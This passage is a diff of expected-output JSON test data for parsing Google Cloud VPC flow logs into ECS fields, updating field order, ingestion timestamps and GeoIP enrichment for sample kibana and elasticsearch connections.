"ecs": { "version": "1.12.0" @@ -6319,6 +6573,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -6339,8 +6596,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 53706, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1791, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391497500Z", + "ingested": "2021-12-14T14:43:27.415207642Z", "original": "{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", @@ -6348,6 +6630,18 @@ "id": "bnj3cofh3cdjv", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", + "bytes": 1791, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -6362,11 +6656,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33858, @@ -6438,7 +6737,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391503Z", + "ingested": "2021-12-14T14:43:27.415208042Z", "original": "{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", @@ -6449,41 +6748,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33064, - "bytes": 1467, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6494,6 +6758,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -6514,8 +6781,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33064, + "bytes": 1467, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391508400Z", + "ingested": "2021-12-14T14:43:27.415208435Z", "original": "{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", @@ -6523,6 +6815,18 @@ "id": "bnj3cofh3cdkg", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -6537,11 +6841,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -6613,7 +6922,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391514300Z", + "ingested": "2021-12-14T14:43:27.415208969Z", "original": "{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -6624,22 +6933,57 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 43 + } + } + }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53706, @@ -6647,6 +6991,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415209366Z", + "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:50.703302550Z", + "end": "2019-06-14T03:43:50.822333871Z", + "id": "bnj3cofh3cdk9", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6658,7 +7012,9 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6669,6 +7025,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -6685,25 +7044,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 43 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391519800Z", - "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:50.703302550Z", - "end": "2019-06-14T03:43:50.822333871Z", - "id": "bnj3cofh3cdk9", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -6712,11 +7056,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 52260, @@ -6724,6 +7073,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415209771Z", + "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:11.063146265Z", + "end": "2019-06-14T03:42:11.183868408Z", + "id": "bnj3cofh3cdkj", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6735,19 +7094,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -6758,36 +7128,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391525200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:11.063146265Z", - "end": "2019-06-14T03:42:11.183868408Z", - "id": "bnj3cofh3cdkj", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34090, @@ -6801,6 +7155,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210163Z", + "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:37.712749588Z", + "end": "2019-06-14T03:46:37.827345444Z", + "id": "bnj3cofh3cdki", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6812,7 +7176,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6823,6 +7189,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -6843,28 +7212,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391530600Z", - "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:37.712749588Z", - "end": "2019-06-14T03:46:37.827345444Z", - "id": "bnj3cofh3cdki", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34178, @@ -6878,6 +7237,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210548Z", + "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:51.237256499Z", + "end": "2019-06-14T03:46:51.355687385Z", + "id": "bnj3cofh3cdkd", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6889,7 +7258,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6897,9 +7268,12 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.13" + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -6920,28 +7294,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391536100Z", - "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:51.237256499Z", - "end": "2019-06-14T03:46:51.355687385Z", - "id": "bnj3cofh3cdkd", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33064, @@ -6955,6 +7319,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210935Z", + "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:40.125336665Z", + "end": "2019-06-14T03:44:40.243022993Z", + "id": "bnj3cofh3cdjw", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6966,25 +7340,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -6995,23 +7368,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391541500Z", - "original": 